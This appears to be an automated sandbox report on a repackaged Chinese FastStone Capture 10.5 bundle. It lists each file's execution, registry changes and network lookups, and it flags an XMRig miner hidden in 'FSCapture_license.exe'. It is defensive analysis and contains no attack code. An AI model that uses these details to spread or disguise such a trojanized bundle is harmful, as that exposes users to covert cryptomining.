US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

memory/396-0-0x0000000001980000-0x0000000001981000-memory.dmp

memory/396-1-0x0000000000D40000-0x0000000000F76000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp

Files

memory/1516-0-0x0000000002C10000-0x0000000002C11000-memory.dmp

memory/1516-1-0x0000000006C80000-0x0000000006C9E000-memory.dmp

memory/1516-4-0x0000000002C10000-0x0000000002C11000-memory.dmp

memory/1516-3-0x0000000000640000-0x0000000000D4F000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

152s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\FilterData = 02000000000020000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000006175647300001000800000aa00389b7100000000000000000000000000000000 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\ = "FastStoneVirtualAudio" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\CLSID = "{7D24573C-DB27-3694-BEC3-4263D335A781}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FSCapture-10.5-CN\\bin\\FSCPlugin05.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\FriendlyName = "FastStoneVirtualAudio" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 1960 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4048 wrote to memory of 1960 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4048 wrote to memory of 1960 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20241010-en

Max time kernel

119s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 224

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

138s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe"

Network

Country Destination Domain Proto

Files

memory/5028-0-0x0000000002E30000-0x0000000002E50000-memory.dmp

memory/5028-1-0x0000000000400000-0x0000000000E80000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

120s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 248

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe"

Network

N/A

Files

memory/2232-0-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/2232-1-0x0000000000810000-0x0000000000BA7000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe"

Network

Country Destination Domain Proto

Files

memory/4004-0-0x0000000002460000-0x0000000002461000-memory.dmp

memory/4004-1-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

117s

Max time network

119s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

Network

N/A

Files

memory/2192-0-0x0000000000010000-0x0000000000017000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

156s

Command Line

"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\423Down.url

Signatures

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4824 wrote to memory of 860 N/A C:\Windows\System32\rundll32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 2856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 468 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\System32\rundll32.exe

"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\423Down.url

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.423down.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb55446f8,0x7ffcb5544708,0x7ffcb5544718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5488 /prefetch:2

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_860_GKCRAUMXVDLWOWRS

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe599503.TMP


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences


Analysis: behavioral17

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20241010-en

Max time kernel

122s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe"

Network

N/A

Files

memory/2064-0-0x00000000003B0000-0x00000000003B1000-memory.dmp

memory/2064-1-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20241010-en

Max time kernel

119s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

Network

N/A

Files

memory/768-0-0x0000000000170000-0x000000000018E000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

120s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe"

Network

N/A

Files

memory/2696-0-0x0000000000E80000-0x0000000000EA0000-memory.dmp

memory/2696-1-0x0000000000400000-0x0000000000E80000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3372 wrote to memory of 1096 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

Network

Country Destination Domain Proto
